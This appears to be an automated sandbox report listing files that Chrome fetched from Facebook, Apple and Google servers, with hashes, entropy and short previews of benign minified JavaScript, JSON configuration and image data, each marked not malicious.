                                                                                                                                                                                                                                SHA-256:1F5E1C160B83087F12390614A70918A5518E634A39DB64FE9AF47E4E487A358B
                                                                                                                                                                                                                                SHA-512:1DEFA4012FE8C722FD76E7AEF8B13D54B45FEFC7A5A25EDC02E210A04957F3C387DC5BFBE99FE2F911DE797497E789FD8C0D0C8ACDE812A7EE7E558BF60224EF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/BTuEBPL3Mnd.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);.__d("BasicVector",[],(function(a,b,c,d,e,f){a=function(){function a(a,b){this.x=a,this.y=b}var b=a.prototype;b.derive=function(b,c){return new a(b,c)};b.toString=function(){return"("+this.x+", "+this.y+")"};b.add=function(a,b){b===void 0&&(b=a.y,a=a.x);a=parseFloat(a);b=parseFloat(b);return this.derive(this.x+a,this.y+b)};b.mul=function(a,b){b===void 0&&(b=a);return this.derive(this.x*a,this.y*b)};b.div=function(a,b){b===void 0&&(b=a);return this.derive(this.x*1/a,this.y*1/b)};b.sub=function(a,b){if(arguments.length===1)return this.add(a.mul(-1));else return this.add(-a,-b)};b.distanceTo=function(a){return this.sub(a).magnitude()};b.magnitude=function(){return Math.sqrt(this.x*this.x+this.y*this.y)};b.rotate=function(a){return this.derive(this.x*Math.cos(a)-this.y*Math.sin(a),
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 171 x 56, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3535
                                                                                                                                                                                                                                Entropy (8bit):7.537698484459483
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:1sN9UcmQiiq5kRFWjqyjsJql4Ug30V1mYP9QHEZNWd02XAeivOo+myviJ/0n52mB:1ErFWB+Un7jP9QANWd7/8+m1ccY/
                                                                                                                                                                                                                                MD5:432139435250177A033CD2D1778D2883
                                                                                                                                                                                                                                SHA1:280992DC9962F26E711F3B982D27B154770D0CE5
                                                                                                                                                                                                                                SHA-256:EDDA9B189A90EFF4209A0295E64FBAFBA2D44801ED471BF8263D277845C22BD1
                                                                                                                                                                                                                                SHA-512:ACD97392DF5F74FE3A3BEA2A8D20467A8367FEB1C797B021363A7D1995AE9644680EC81E32D169E83B5A205A66A4DB999A27D6481BF29CF8C1AFFD8C234DA19C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......8.............PLTEGpL........................................................................................................................................................................................................................................................................1P.......................................................:X.........................9X.:X...................:X.7V................:Y.:X. @.:X.:X.7T....:X.:X.+U.:X.5S.9U.:X....:Y.:X.:Y.:X.7Y.;X.;X.;X.:X.3D.9X.9W...........h.;Y.nA....WWWbixdkzPPPT[j^etV]lgn}..I.~2.q".{0.x,Zap..N..>........s...D.............P................p .........q.U....k.[...........~.q.........^.z....tRNS..F........&....2.....H.<h..,.^.....*f0$....`"(...\..:P..r..@4.j.T..R... .LzZ.n....V..b.6p8.......JN..>..dt..B.l..p.x|..D.*X~.v.....#.......`..l....z..0^.......NIDATx^.gO#I.....g.'...`..o..69.....%.....A...^>_..Q......{a.t..UOuU.o.rM.@..AC..i?..Bm.&.T&.5Iu'.......M.su.&..}.T..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6999)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):34922
                                                                                                                                                                                                                                Entropy (8bit):5.359620627574951
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+YEHVIVIVeVoVeVjVDVjVjVMV9:RIT7hsZwuvLN54WAcl5100eUeZ5ZZAK+
                                                                                                                                                                                                                                MD5:15710A1D3C11151B3EAC2EC844FA03DD
                                                                                                                                                                                                                                SHA1:C79A4AC27A1E3017BBEC229031ED4A9976D26A15
                                                                                                                                                                                                                                SHA-256:27928DD5441B4297F3B11F51CBEC9298F03B891224C706574BE55E7284CE9B8A
                                                                                                                                                                                                                                SHA-512:09AA6213CF12B51A701E4FB6C74C1105DC67422EC9CED201DEC01DC271548EAD020DE95F757DF0AE5FD7BE62F8D19C26193EEFD0BF4744F858678EE89D6C93C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://connect.facebook.net/signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3933)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):15391
                                                                                                                                                                                                                                Entropy (8bit):5.268517708621699
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:Pw21wClfXpg0JNGPq/MtLsXDqFlhaLjv3h:Po2fBJfEtsziXaLjvx
                                                                                                                                                                                                                                MD5:CE60742BF1533AE782AE943CA2E46D3D
                                                                                                                                                                                                                                SHA1:49EA2568DDE3A2368F96D293F3824E1633853F41
                                                                                                                                                                                                                                SHA-256:F4DFA8F5F61F1239882A3C4AE0981971DADCA7C66FB64F01C8F299CE5157A215
                                                                                                                                                                                                                                SHA-512:8F881198759785C7ADE63FA0D757AFED5D6D3036C3DAB02CA84BF0C9B4F5B51360F0ACEC3F7A7990644C39A87CBDCD9392665725A3FB986ADB0768D68AF77ABC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractLinkLynxMode",["FBLynx","LinkshimHandlerConfig"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return a?[c("LinkshimHandlerConfig").www_safe_js_mode,null]:["hover",null]}function b(){d("FBLynx").setupDelegation()}g.getMode=a;g.setupDelegation=b}),98);.__d("DialogHideOnSuccess",["csx","CSS"],(function(a,b,c,d,e,f,g){a=function(){"use strict";function a(a){this._layer=a}var c=a.prototype;c.enable=function(){this._subscription=this._layer.subscribe("success",this._handle.bind(this))};c.disable=function(){this._subscription.unsubscribe(),this._subscription=null};c._handle=function(a,c){b("CSS").matchesSelector(c.getTarget(),"._s")&&this._layer.hide()};return a}();Object.assign(a.prototype,{_subscription:null});e.exports=a}),null);.__d("DialogPosition",["Vector"],(function(a,b,c,d,e,f,g){var h=40,i;function a(a,b,d,e,f){d===void 0&&(d=null);e===void 0&&(e=!1);f===void 0&&(f=!1);var g=c("Vector").getViewportDimensions(),j=!1;e&&d&&(j=d+b>g.y);if(d!=null&
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12738
                                                                                                                                                                                                                                Entropy (8bit):7.981822110186911
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4De57jXcA/LSZgXihPzkr5SiDDfjbenDvtOINRmt/xwThdzK4ra0X:4i7rLSyitzt+/87tngDK24rh
                                                                                                                                                                                                                                MD5:CBA5B2EF30FCCD76A63324BE2FE89772
                                                                                                                                                                                                                                SHA1:D45610999887710ECF0C12841BAAC840CAEF3EF2
                                                                                                                                                                                                                                SHA-256:B5C774F4EED59D9F6E4A4F6B783F1500EC35CDC10ECE19B962B65F4CD34D1CD8
                                                                                                                                                                                                                                SHA-512:64F35CB24D8CF25437910C8D37E4164158B5FB7B3490714D227989A3C3FE8D26F14AC428063CD6807629B33C6C1BC22FB02A45F74B28EF42F2684127D975BFBD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF.1..WEBPVP8 .1.......*..(.>e(.E$"..[.@.D..he..s........o...w........UW..:.......+.'......A.....J......d?..P....~.................[................W..........o...^....@?.q@.e.]...+...m..p}.rO.G.^..3....._......s.....B?".{.[.?....z..1.?....w..|.}?..E>......w.c......?.........._._.......o.C.#..._.?m=.}W.....7..._............/...n..{.......U.#}.F.@.I4x.D#].....l..b.5.$._...1..3.....~.0D..."T....WV....R+|(....\b.....S...."_3.w........W.#.&...9......A.Zk......o.Zt*.X.qCr.....(..U.j..Y.B..6o...Mu.gA..D..qd2.8...~..}.|f.Z.<....sp.Z.sQ.....X..M.fU....)o.5.I.Y....R.=...H.d...%.O6.D...*F..zb.?..n.....x..C$\.E...(D..$.,j.&......#...m..O..Z$..h....sxq.nO..L.e.!......56..O..m..h.y..Z.\s...f..o...-k.HU.LTl..eH..'..5...@..<?$f.L;...iwG....,.++~.<..4.....d..G..q[.1.Qxy$..9..q......I.9*...u;.p.....lk.>....\..V.8n...#`;.@...A.C;..".cI."..~........tl]..r<^....NO3.-...^y..o!...Q....t.,.E.....~TV......y.:.7U...i.k:..q..A}....;......\.a@ei..I..<G_@.l.V.if...+.k.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1386
                                                                                                                                                                                                                                Entropy (8bit):4.8492224043496055
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Yorj8jYfQypuazl92Qypua5HR9Iszb9mPuazEBb9mPuaSlSfvBLRKkfkMqVlM:Y4XzZzlkZTyszbgzEBbg+SJRKtpM
                                                                                                                                                                                                                                MD5:662EA2BBC39B50BCDCBE04DC2CD7A087
                                                                                                                                                                                                                                SHA1:4705F797D3E54D7953493DEBA121A8B4C397060F
                                                                                                                                                                                                                                SHA-256:BFA43BCF43FA6CED5E1AF0BA042098DA244E4441A9C1D53E4B7B0DBFE764B1C6
                                                                                                                                                                                                                                SHA-512:7E9903DE3548135C5C17813B2438D337BB565CEA17E6C3A5A4D7FF4B3A197A67B9FA6A16296A13174C5FA0D2E77EFBEC019E816541E074ACDB764F88EC685028
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://xp.apple.com/config/1/report/xp_amp_web_exp
                                                                                                                                                                                                                                Preview:{"blacklistedFields":[],"constraints":{"profiles":{"AMPWeb":{"precedenceOrderedRules":[{"filters":{"nonEmptyFields":["isSignedIn"]},"fieldConstraints":{"clientId":{"generateValue":true,"namespace":"AMPWeb_isSignedOut","expirationPeriod":86400000}}},{"filters":{"valueMatches":{"isSignedIn":[true]}},"fieldConstraints":{"clientId":{"fieldType":"id","generateValue":true,"namespace":"AMPWeb_isSignedIn","expirationPeriod":15552000000}}}]}}},"treatmentProfiles":{"AMPWeb":{"treatments":[{"filters":{"isSignedIn":{"nonEmpty":true}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedOut","lifespan":86400000}}},{"filters":{"isSignedIn":{"valueMatches":[true]}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedIn","lifespan":15552000000}}}]}},"compoundSeparator":"_","fieldsMap":{"cookies":["itcCt","itscc"],"custom":{"impressions":["id","adamId","link.type","station-
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8477)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51589
                                                                                                                                                                                                                                Entropy (8bit):5.384712804809677
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:OLYXGST0ki7JD5x0KDKDJcrjrMwmvsPD3RcG1K3pWT:OLYXGHkiDx0KDCJcrjrMwmvsPD3o4T
                                                                                                                                                                                                                                MD5:3608E76FBDA351ADDB0E78EEAA73AFD1
                                                                                                                                                                                                                                SHA1:31655B8076AFFD1A292A133392F353A3EDAC2BDB
                                                                                                                                                                                                                                SHA-256:651A7CADCEAFB12DF8E6D5B923F1DF00D33B632B1E4BD9BD3F1C01A92450B4F7
                                                                                                                                                                                                                                SHA-512:5E99BACE7EBDC97AC89C92DDBC8D608737F11646EABAAFBE70520B6F5A1EAE421508465F4F2A6C17840CF8A30B21778819E907BEB8717D7292A506F99384A7CF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);.__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContextName=function(){return this.cn};return a}();f["default"]=a}),66);.__d("BDSignalCollectorBase",["BDSignalBufferData","SignalValueContext","regeneratorRuntime"],(function(a,b,c,d,e,f,g){"use strict";a=function(){function a(a){this.signalType=a}var d=a.prototype;d.executeSignalCollection=function(){throw new Error("Child class responsibility to implement executeSignalCollection")};d.executeAsyncSignalCollection=function(){var a;return b("regeneratorRuntime").async(function(c){while(1)switch(c.prev=c.next){case 0:c.next=2;return b("regeneratorRuntime").awrap(this.executeSignalCollection());case 2:a=c.sent;return c.abrupt("return",a);case 4:case"end":return c.stop()}},null,this)};a.getSanitizedURI=function(){var a=window.location.href,b=a.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2106
                                                                                                                                                                                                                                Entropy (8bit):7.554456957317547
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:EWP8JUaPVKWwCtcHB3sXXRBJ3v8qkZ/aWr/3KZerMLvSOxJ3Df8sfqV1:lkJVKWw03XXZ4Meo931fq
                                                                                                                                                                                                                                MD5:6452ED75C53E1A8E90A664DF18959A90
                                                                                                                                                                                                                                SHA1:AC01FC2F40F0E4808E22A9C569F3775F0F15A5E2
                                                                                                                                                                                                                                SHA-256:C7BAC3E7016DFC7EB5787579BAC6B975B433FC1A9C279DAFC35649D4782F2061
                                                                                                                                                                                                                                SHA-512:4B23F7FB31826943CBA6496BD74DC620C8EC3B8F0525497E825F1F1F87486335D4374F85417458C3C3E018C2215B9B419D7DE77CB67AAE9EA619038432E1EB10
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/eFZD1KABzRA.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............e..5...YPLTEGpL.e..e..e..p..e..f..f..h..f..f..`..`.....g..f..f..g..g..f..f..f..g..f..h..e..f..d..g..e..e..c..f..f..e..f..g..g..e..f..f........i..h..e..f..f.....e........e..g..f..f..f..f..f..f..g........f..e..e.......F........................f....F.....d........'y.....p....E.....U..7..t.................6..t...........U.................................p......uy...LtRNS.0`..... ......p..._....@..@..oPP...O.^..__....0.o.o.oO..p.P.P_n. ..@0..P........DIDATx..YS.G..G.]..N...t.6&.$..8v|.>{.."....m.3...../...X...*./.....z..Z...^-."|GT(T.K..Z..n..z.3..BT..Z....\.)..Y.....)..\XZs%..e../...........:....Z.R...,X...B....VCL......".~)P...@..P..8......YG..<...=..BLs..CX........0..J...I....Z..,....0g...i...B..}6.Eh.$.g.D1.k......... ..WYD....O..b~.~......U..s4..?...d0........x.g7.zF...........9..G*.A...~...=#.w0.1Z......K..BV..>....x.p...<LS...ft..(|...2XDE.Q...yc..$Mu.@.L...R=.X,.H....!.X).j../.-q2.....09.........\...&.bYk........j.o......../.u}..(5!.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4490)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):17188
                                                                                                                                                                                                                                Entropy (8bit):5.523601084159109
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E2PzxIwk6jqPSZUXV4jqPSZq17i+PV0vvnXhFawn8zVt9Pub6KS8BEUK582htJvh:lbxIwk6jqPSZUXV4jqPSZq17i+PV0vv4
                                                                                                                                                                                                                                MD5:4BF456ED44F476CA182A174331B0769E
                                                                                                                                                                                                                                SHA1:1DD833E61B5D88FD4404F1F876C5042523AB2419
                                                                                                                                                                                                                                SHA-256:17721B2B06911470866BF609A6BF205E806C5FB4CA4B6DA278984DB5B1F6F2C1
                                                                                                                                                                                                                                SHA-512:C406C0F6EEB84AA6CB64A45E2DFECD585EFD0C8BE4651FD7D17AA37489C48A8AADDD22691606400AE2D07803851DD08518E8F25E2800CCB00B160AB0A7D23D65
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);.__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID")());return a.id}g["default"]=a}),98);.__d("FocusEvent",["Event","Run","ge","getOrCreateDOMID"],(function(a,b,c,d,e,f,g){"use strict";var h={},i=!1;function j(a,b){if(h[a]){b=h[a].indexOf(b);b>=0&&h[a].splice(b,1);h[a].length===0&&delete h[a]}}function k(a){var b=a.getTarget();if(h[b.id]&&h[b.id].length>0){var c=a.type==="focusin"||a.type==="focus";h[b.id].forEach(function(a){a(c)})}}function l(){if(i)return;c("Event").listen(document.documentElement,"focusout",k);c("Event").listen(document.documentElement,"focusin",k);i=!0}function a(a,b,e){e===void 0&&(e={cleanupOnLeave:!0});l();var f=c("getOrCreateDOMID")(a);h[f]||(h[f]=[]);h[f].push(b);var g=!1;function i(){g||(j(f,b),k&&(k.remove(),k=null),g=!0)}var k=((a=e)==null?void 0:a.cleanu
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4901)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):28366
                                                                                                                                                                                                                                Entropy (8bit):5.376121039685713
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:3dK9QwifftFUJ+4sPSPgx3b52eBwGEja4CFTDvVUczyL2FjAl+oM+NjX+P:wQ2aSPgx3h81PKFjAS
                                                                                                                                                                                                                                MD5:73B3BCEF1573E8E904764459C5C03E27
                                                                                                                                                                                                                                SHA1:938C9627FEFDF5D625C0C6E449FD65FCCA64962E
                                                                                                                                                                                                                                SHA-256:073A42ECC9A4844E45FE12A0CA272E0C72155D629B8E9D8667764CD63ADA89D9
                                                                                                                                                                                                                                SHA-512:483935D5A6F39C445FC357C8B6F4C60A792967FF9D0BB72EEAF55869792481E97ABFD64FA401FD18FF589ADDA7CB1A4E4F2D3980C4C4ABABAB1C944F73DDE787
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractFBEmoji.react",["cx","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i,j=i||d("react");function a(a){var b=a.children,c=a.size,d=a.src;a=a.title;c={height:c,width:c,fontSize:c,backgroundImage:"url('"+d+"')"};return j.jsx("span",{className:"_5mfr",title:a,children:j.jsx("span",{style:c,className:"_6qdm",children:b})})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("BadgeHelper",["cx","fbt","DOM","joinClasses"],(function(a,b,c,d,e,f,g,h){var i={xsmall:"_5dzz",small:"_5dz-",medium:"_5dz_",large:"_5d-0",xlarge:"_5d-1"},j={bot:"_64nf",verified:"_56_f",trending:"_1gop",topcommenter:"_59t2",page_gray_check:"_5n3t",page_gray_check_solid:"_6w81",work:"_5d62",game_blue:"_59c6",work_non_coworker:"_2ad7",work_official_badge:"_8b0y",work_official_badge_gray:"_8b-m",interest_community:"_3qcr",subscription:"_4fvy",inactive_user:"_7xv0",multi_company_group:"_9o_f"};c=h._("Official group");var k={bot:h._("Bot"),work_non_coworker:h._("Not part of y
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (3857)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1160544
                                                                                                                                                                                                                                Entropy (8bit):5.44525335877561
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:7IcMsN8pGT4l9C8OGMVi7Bv01hCAURju5p9NI:pUlT3v01Qg96
                                                                                                                                                                                                                                MD5:56D26A46D0406F26005B8F47282EE333
                                                                                                                                                                                                                                SHA1:69438EBE096B22A729813A305B578D0A58507384
                                                                                                                                                                                                                                SHA-256:B5D9652D1696ADD89336DCCC3A72768A9E09D64D1186A82F2F8C38AFE117E4EF
                                                                                                                                                                                                                                SHA-512:9BFA2CF2EDA8AE9BF95EDB16CB8E076CC18693AC25727871B3ECF1C6B22268C6745BB49A49BA66236CB9224BF6CC3DABE38229A703602A3CA62DEFE1552737F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/web-experience-app-ef5f5b62ff48eb6b3d594ccbde0b4496.modern.js
                                                                                                                                                                                                                                Preview:/*! See /acknowledgements.txt for open-source licenses */."use strict".define("web-experience-app/app",["exports","@ember/application","@ember/debug","@amp/web-apps-featurekit","web-experience-app/resolver","ember-load-initializers","web-experience-app/config/environment","web-experience-app/utils/config","web-experience-app/utils/consts"],(function(e,t,r,i,n,a,o,l,s){function p(e,t,r){var i.return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e.var r=e[Symbol.toPrimitive].if(void 0!==r){var i=r.call(e,t||"default").if("object"!=typeof i)return i.throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"))?i:String(i))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0,"undefined"==typeof global&&"undefined"!=typeof window&&(window.global=window).class c extends t.default{constructor(...e){super(...e)
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (16042)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):182311
                                                                                                                                                                                                                                Entropy (8bit):5.451905341264212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:nxgSNPtIa33ZDcnkoSyOjb4SVPkFKsoP90Cls+j5ppjKa:q0kRG
                                                                                                                                                                                                                                MD5:84D2537133FE5ECA4A2637D15B9825DC
                                                                                                                                                                                                                                SHA1:B5D7E28F8E7278EC8ED139B4BBACEB233268E7B3
                                                                                                                                                                                                                                SHA-256:02B230AE382133BF1CC981246A730C3B33E81DFCD17E9A1AA4991939631981FD
                                                                                                                                                                                                                                SHA-512:06E11485B2CE0C08FF1526B713997BE6BAA8763E0E169EB3B52CF6F782F96E92A9AD6E89908EDD1F099C40CDF2F5D720DAFDD31010E6BE7CD3A81F3E62289CA0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("compareDOMOrder",[],(function(a,b,c,d,e,f){"use strict";function a(a,b){return a.compareDocumentPosition(b)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1}f["default"]=a}),66);.__d("createLayoutContext",["compareDOMOrder","emptyFunction","react","useRefEffect","useUnsafeRef_DEPRECATED"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useContext,l=b.useImperativeHandle,m=b.useMemo,n=b.useReducer;function a(a){var b={getLayout:function(){return a},dispatch:c("emptyFunction"),nodes:new Map(),values:[]},d=j.createContext(b);function e(a){var b=a.children,c=a.imperativeRef,e=a.value;a=q();var f=a[0],g=a[1],h=a[2];l(c,function(){return{forceUpdate:function(){return h()}}},[h]);a=m(function(){return{getLayout:e,dispatch:h,nodes:f,values:g}},[h,f,e,g]);return j.jsx(d.Provider,{value:a,children:b})}e.displayName=e.name+" [from "+f.id+"]";function g(a){return j.jsx(d.Provider,babelHelpers["extends"]({value:b},a))}g.displayName=g.name+" [from "+f.id+"]
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):60476
                                                                                                                                                                                                                                Entropy (8bit):7.993110142611454
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:768:zS8qpTxxqzhkOlrZHy4MKEl4A4BwM/EzYSr/TaKzYp8gQoi058SHc0lT5fKTee8u:zS8qtqzHRlyAElUieE0SA8gqA8SHrQL7
                                                                                                                                                                                                                                MD5:4BC38B50B6C612518D5F544E36B32024
                                                                                                                                                                                                                                SHA1:DA8CA87C9238FDC8EB3316C65A8202467FAD4015
                                                                                                                                                                                                                                SHA-256:C45F8416C8EF731EFEAC53F0582A8DEF797F9159E5277BFB311A729723722A76
                                                                                                                                                                                                                                SHA-512:952033583F2E3F9BDBC1205309702AB03723F5EA22B32CB90BCA7E7D6303ED4975B4F93B5BB62DA2EC09E6B95081D090408EDD28D71CA45D3E1724827BD73A76
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw
